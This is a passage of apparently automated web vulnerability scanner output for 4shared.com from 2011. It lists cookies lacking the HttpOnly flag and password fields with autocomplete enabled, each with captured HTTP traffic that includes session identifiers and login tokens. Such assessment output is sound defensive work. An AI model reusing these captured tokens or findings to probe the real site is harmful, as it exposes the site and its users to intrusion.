GET /images/topbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:37 GMT; Path=/
Set-Cookie: hostid=1314752035; Expires=Mon, 26-Jul-2021 13:59:37 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:37 GMT
ETag: W/"267-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 267
Date: Fri, 29 Jul 2011 13:59:37 GMT

GIF89a..,.....wx{||lmpww{\\`uvypqtrsvqrvggkefiTUYopsXY]}~.WX\^_cz{~uuynor{|gikmnpz{}bdgaadhil~.xy|~~.|}.stwjkn....................................................................................
...[SNIP]...

6.145. http://www.4shared.com/images/vborders.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/vborders.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/vborders.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:08:01 GMT; Path=/
Set-Cookie: hostid=-1869152100; Expires=Mon, 26-Jul-2021 14:08:01 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:08:01 GMT
ETag: W/"212-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: image/gif
Content-Length: 212
Date: Fri, 29 Jul 2011 14:08:01 GMT

GIF89a.......~.......Z[]...NOSfgiqrt...el....z{}......mnpbh.\a{...fm.V[s...t{.qx.hn.di.mt...................!.......,..........Q`.0
.i(ZY......H1.N>.q/....`...>`p.$.....pX.......b{..).V0..^"..L$=...X
...[SNIP]...

6.146. http://www.4shared.com/js/Events.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/Events.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/Events.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:17 GMT; Path=/
Set-Cookie: hostid=-605073586; Expires=Mon, 26-Jul-2021 13:59:17 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:17 GMT
ETag: W/"669-1311851860000"
Last-Modified: Thu, 28 Jul 2011 11:17:40 GMT
Content-Type: text/javascript
Content-Length: 669
Date: Fri, 29 Jul 2011 13:59:16 GMT


function Events() {
return this
}

Events._listeners = []

Events.addListener = function(event, listener) {
if (!Events._listeners[event])
Events._listeners[event] = []
Events._li
...[SNIP]...

6.147. http://www.4shared.com/js/homeScript.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/homeScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/homeScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:10:53 GMT; Path=/
Set-Cookie: hostid=-1156853492; Expires=Mon, 26-Jul-2021 14:10:53 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:10:53 GMT
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 44840
Date: Fri, 29 Jul 2011 14:10:53 GMT


var i=1;
var ua = navigator.userAgent;
var opera = /opera [56789]|opera\/[56789]/i.test(ua);
var ie = !opera && /MSIE/.test(ua);
var ie50 = ie && /MSIE 5\.[
...[SNIP]...

6.148. http://www.4shared.com/js/jquery-1.4.4.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/jquery-1.4.4.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/jquery-1.4.4.min.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=-1031718777; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"78601-1295256544000"
Last-Modified: Mon, 17 Jan 2011 09:29:04 GMT
Content-Type: text/javascript
Content-Length: 78601
Date: Fri, 29 Jul 2011 13:59:32 GMT

/*!
* jQuery JavaScript Library v1.4.4
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

6.149. http://www.4shared.com/js/loginScript.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/loginScript.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginScript.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:07 GMT; Path=/
Set-Cookie: hostid=1956124399; Expires=Mon, 26-Jul-2021 14:05:07 GMT; Path=/
Vary: *
Content-Type: text/javascript
Content-Length: 1346
Date: Fri, 29 Jul 2011 14:05:06 GMT


function clearLogin(){
var field=document.getElementById('loginfield');
if (field.value=="your e-mail") {
field.value="";
field.className = field.className.replace("fieldhint
...[SNIP]...

6.150. http://www.4shared.com/js/signup-script.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/signup-script.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/signup-script.jsp?ver=5756 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 14:05:03 GMT; Path=/
Set-Cookie: hostid=1332572779; Expires=Mon, 26-Jul-2021 14:05:03 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 14:05:03 GMT
Vary: *
Content-Type: text/javascript
Content-Length: 3516
Date: Fri, 29 Jul 2011 14:05:03 GMT


function checkForm(form) {
var form=document.theForm;
if (form.login.value==null || form.login.value.length==0) {
alert ("You did not enter your e-mail address");
form.
...[SNIP]...

6.151. http://www.4shared.com/js/sysinfo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/sysinfo.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/sysinfo.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: day1host=h; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:59:32 GMT; Path=/
Set-Cookie: hostid=45943599; Expires=Mon, 26-Jul-2021 13:59:32 GMT; Path=/
Cache-Control: public, max-age=432000
Expires: Wed, 03 Aug 2011 13:59:32 GMT
ETag: W/"2351-1295256546000"
Last-Modified: Mon, 17 Jan 2011 09:29:06 GMT
Content-Type: text/javascript
Content-Length: 2351
Date: Fri, 29 Jul 2011 13:59:32 GMT

// Information that needs to be collected are setup as variables.

var Agent = navigator.userAgent;
var Available_Height = screen.availHeight;
var Available_Width =screen.availWidth;
var Browser_
...[SNIP]...

6.152. http://www.4shared.com/login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: fp=4sess_p50722b1a_t20110729-145755_; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 27078
Date: Fri, 29 Jul 2011 13:57:54 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login</title>
<met
...[SNIP]...

6.153. http://www.4shared.com/premium.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /premium.jsp?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ppage=P2; Domain=.4shared.com; Path=/
Set-Cookie: ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947946262; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 50945
Date: Fri, 29 Jul 2011 13:59:06 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared - Get your Premium Account - Fast speed, no limit
...[SNIP]...

6.154. http://www.4shared.com/signup.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /signup.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signup.jsp HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:52 GMT; Path=/
Set-Cookie: ppVisited=%2Fsignup.jsp; Domain=.4shared.com; Path=/
Set-Cookie: ppVisitDate=1311947872791; Domain=.4shared.com; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 23864
Date: Fri, 29 Jul 2011 13:57:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; ch
...[SNIP]...

7. Password field with autocomplete enabled  previous  next
There are 6 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


7.1. http://www.4shared.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT


<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div style="padding:9px;">
<form name="signUpForm" action="http://www.4shared.com/index.jsp" method="post" class="openid">
<input type="hidden" name="sId" value="f5uzfaHd0sNGJlVU" />
...[SNIP]...
<td><input type="password" name="password" id="regpassfield" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...
<td><input type="password" name="password2" id="regpassfield2" class="regfield xBox" style="width:200px" ></td>
...[SNIP]...

7.2. http://www.4shared.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:56:34 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 45901
Date: Fri, 29 Jul 2011 13:56:33 GMT


<!DOCTYPE html>
<html>
<head>
<script type="text/javascript">if (self != top) {top.location = self.location; }</script>
<title>4shared.com - free file sharing and s
...[SNIP]...
<div>
<form action="http://www.4shared.com/index.jsp" method="post" class="openid">

<div class="small alert" id="loginRejectReason" style="display:none;">
...[SNIP]...
<br>
<input id="passfield" name="password" type="password" class="f"
value="">
<br/>
...[SNIP]...

7.3. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: adp=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: asl=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: chf=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: ausk=Sdt45IRrRqsiuJEj; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: dirPwdVerified=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Vary: *
Content-Type: text/html;charset=UTF-8
Content-Length: 35973
Date: Fri, 29 Jul 2011 13:57:09 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>4shared.com - free file sharing and storage - Login or S
...[SNIP]...
</center>
<form name="signupForm" class="openid" action="https://www.4shared.com/enter.jsp" method="post" onsubmit="return checkForm(document.signupForm)">
<input type="hidden" name="submitType" value="signup"/>
...[SNIP]...
<td><input type="password" name="password" class="regfield" style="width:210px"></td>
...[SNIP]...
<td><input type="password" name="password2" class="regfield" style="width:210px"></td>
...[SNIP]...

7.4. http://www.4shared.com/enter.jsp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /enter.jsp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /enter.jsp?sId=Sdt45IRrRqsiuJEj&&fau=1&ausk=Sdt45IRrRqsiuJEj&au=1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: df=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: sd=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
Set-Cookie: afu=""; Domain=.4shared.com; Expires=Sat, 30-Jul-2011 13:57:10 GMT; Path=/
